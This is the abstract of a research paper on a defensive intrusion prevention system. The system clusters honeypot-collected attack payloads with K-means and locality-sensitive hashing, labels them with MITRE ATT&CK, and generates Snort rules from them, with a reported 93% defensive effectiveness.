Hybrid Clustering Mechanisms for High-Efficiency Intrusion Prevention.

With the advancement of information and communication technology, cyberattack techniques have evolved into increasingly complex trends. Malicious network traffic attacks have become one of the information security problems for all organizations. This study is aimed to combat malicious network traffic attacks by actively collecting commands from attackers using honeypots. It involves pre-processing the raw network traffic data, employing a K-means algorithm to group the payloads, and label payloads using the MITRE ATT&CK framework. To improve the accuracy of the generated snort rules, the system utilizes Locality-Sensitive Hashing (LSH) method for secondary clustering, combined with snort rule generation, to form a comprehensive intrusion prevention system. In addition, to speed up the experimental process, this study adapted a script for this system to simulate an attacker's attack automatically. Through experimentation, it can be observed that hybrid clustering techniques such as K-means and LSH mechanisms can yield a defensive effectiveness of up to 93% for malicious payloads. This result proves the system's ability to identify and prevent different packet attacks effectively.